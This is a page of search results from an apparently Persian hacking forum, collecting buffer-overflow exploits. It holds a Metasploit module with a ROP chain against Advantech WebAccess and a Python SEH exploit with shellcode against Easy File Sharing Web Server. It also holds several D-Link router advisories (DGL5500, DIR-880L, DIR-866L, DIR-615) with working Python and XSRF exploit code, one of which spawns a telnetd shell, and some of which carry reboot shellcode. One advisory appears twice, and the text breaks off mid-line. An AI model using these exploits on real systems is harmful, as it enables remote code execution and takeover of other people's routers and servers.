رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'overflow'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

84 نتیجه پیدا شد

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  2. #!/usr/bin/env python # Easy File Sharing Web Server v7.2 Remote SEH Based Overflow # The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX # vulnerable file /changeuser.ghp > Cookies UserID=[buf] # Means there are two ways to exploit changeuser.ghp # Tested on Win7 x64 and x86, it should work on win8/win10 # By Audit0r # https://twitter.com/Audit0rSA import sys, socket, struct if len(sys.argv) <= 1: print "Usage: python efsws.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # https://code.google.com/p/win-exec-calc-shellcode/ shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + "\x1c\x39\xbd" ) print "[+]Connecting to" + host craftedreq = "A"*4059 craftedreq += "\xeb\x06\x90\x90" # basic SEH jump craftedreq += struct.pack("<I", 0x10017743) # pop commands from ImageLoad.dll craftedreq += "\x90"*40 # NOPer craftedreq += shellcode craftedreq += "C"*50 # filler httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) print "[+]Sending the Calc...." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
  3. Hacking

    ## Advisory Information Title: DGL5500 Un-Authenticated Buffer overflow in HNAP functionality Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages D-Link Technical Support D-Link Technical Support However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DGL5500 -- Gaming Router AC1300 with StreamBoost. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 1 security issue in DGL5500 firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilitiy in hnap functionality. Does not require any authentication and can be exploited on WAN if the management interface is exposed. ## Details # HNAP buffer oberflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Although you can access this URL unauthenticated on WAN connection which is great but need a good shellcode. buffer overflow in check_hnap_auth buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" buf+="FFFF" buf+="AAAA" #s0 buf+="\x2A\xBF\xB9\xF4" #s1 ROP 2 buf+="\x2A\xC1\x3C\x30" #s2 sleep address buf+="DDDD" #s3 buf+="\x2A\xC0\xEB\x50" #s4 ROP 4 2AC0EB50 buf+="\x2a\xc0\xf3\xe8" # Retn address 2AC0F3E8 ROP1 buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # 36 bytes of gap buf+="\x2A\xBC\xDB\xD0" # ROP 3 buf+="GGGGGGGGGGGGGGGG" buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  4. Hacking

    ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages D-Link Technical Support D-Link Technical Support However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  5. Hacking

    ## Advisory Information Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages D-Link Technical Support D-Link Technical Support However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices. ## Vulnerabilities Summary I have come across 2 security issues in DIR-615 firmware which allows an attacker using XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality. ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&[email protected]&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&[email protected]%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  6. Hacking

    ## Advisory Information Title: DIR-866L Buffer overflows in HNAP and send email functionalities Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF. ## Details HNAP buffer overflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Observe this in a emulator/debugger or real device/debugger buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" buf+="FFFF" buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address buf+="\x2A\xBF\xB9\xF4" #s1 useless buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address buf+="DDDD" #s3 buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1 buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2 buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address buf+="GGGGGGGGGGGGGGGG" buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n" # Bad chars \x00 - \x20 # sleep address 2ac14c30 print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Observe this in a emulator/debugger or real device/debugger buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" buf+="1111" #s0 Loaded argument in S0 which is loaded in a0 buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30 buf+="XXXX" buf+="FFFF" # s3 buf+="XXXX" buf+="BBBB" # s5 buf+="CCCC" # s6 buf+="DDDD" # s7 buf+="DDDD" # extra pad buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1 buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="XXXX" # buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  7. Hacking

    ## Advisory Information Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices. ## Vulnerabilities Summary I have come across 2 security issues in DIR-615 firmware which allows an attacker using XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality. ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&[email protected]&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&[email 